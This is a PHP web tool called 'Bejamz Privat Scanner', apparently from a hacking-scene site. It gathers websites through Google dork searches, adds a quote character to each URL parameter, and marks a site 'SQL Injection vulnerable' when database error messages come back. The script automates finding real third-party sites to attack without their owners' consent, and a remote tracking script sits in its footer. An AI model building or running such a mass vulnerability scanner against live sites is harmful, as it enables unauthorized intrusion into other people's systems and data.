Bejamz Privat Scanner

1. <html>
2. <head>
3. <title>||== SQLI Scaner ==||</title>
4. <style>
5. body{
6. background: #0F0F0F;
7. color: #FFFFFF;
8. font-family:  monospace;
9. font-size: 12px;
10. }
11.  
12. input{
13. background: #0F0F0F;
14. border: 1px solid #00FF00;
15. color: #00FF00;
16. }
17.  
18. h2{
19. color: #55FF2A;
20. }
21.  
22. a{ color: #5A5A5A; text-decoration: none; }
23. a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
24. a:hover{ color: #00FF00; text-decoration: line-through; }
25. .effectok:hover { text-decoration: underline; }
26. .effectfalse:hover { text-decoration: line-through; }
27. </style>
28. </head>
29. <body>
30. <p align="center">
31. <?php
32. echo "<h2>Bejamz Privat Scanner</h2>";
33. echo "<form action='' method='post'>";
34. echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:news.php?id='></p>";
35. echo "<input type='submit' value='Search'>";
36. echo "<hr><br />";
37. if($_POST['dork']) {
38. @set_time_limit(0);
39. @error_reporting(0);
40. @ignore_user_abort(true);
41. ini_set('memory_limit', '128M');
42.  
43. $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
44.  
45. $i = 0;
46. $a = 0;
47. $b = 0;
48. while($b <= 900) {
49. $a = 0;
50. flush(); ob_flush();
51. echo "Pages: [ $b ]<br />";
52. echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
53. echo "Getting result from google...<br />";
54. flush(); ob_flush();
55.  
56. preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
57. echo "Scanning...<br />";
58. flush(); ob_flush();    while(9) {
59. if(preg_match("/You have an error in your SQL','Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function','Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
60. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection vulnerable</font><br />";
61. } else {
62. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Failed</font><br />";
63. flush(); ob_flush();
64. }
65. if($a > count($sites[2])-1) {
66. echo "Done<br />";
67. break;
68. }
69. $a = $a+1;
70. }
71. $b = $b+100;
72. }
73. }
74. function Connect_Host($url) {
75. $ch = curl_init();
76. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
77. curl_setopt($ch, CURLOPT_HEADER, 1);
78. curl_setopt($ch, CURLOPT_URL, $url);
79. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
80. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
81. $data = curl_exec($ch);
82. if($data) {
83. return $data;
84. } else {
85. return 0;
86. }
87. }
88. function Clean($text) {
89. return htmlspecialchars($text, ENT_QUOTES);
90. }
91. ?>
92. </p>
93. <p align="center">Dedicated To :</p>
94. <p align="center">||Vodkadelisfuck||Hexadecimal||ArRay||N4is3n||Gt_Portnoy||Rinowengi||Gblack|| ​</p>
95. <p align="center">||== Hacker-Newbie.org ==||</p>
96. <p align="center">Contact inbox@bejamz.us This e-mail address is being protected from spambots. You need JavaScript enabled to view it </p>
97. </body>
98. <center><font color=00FF00><script type="text/javascript" src="http://st1.freeonlineusers.com/on3.php?id=172058"> </script>Yang Lagi Nyecan</font></a></center>
99. </html>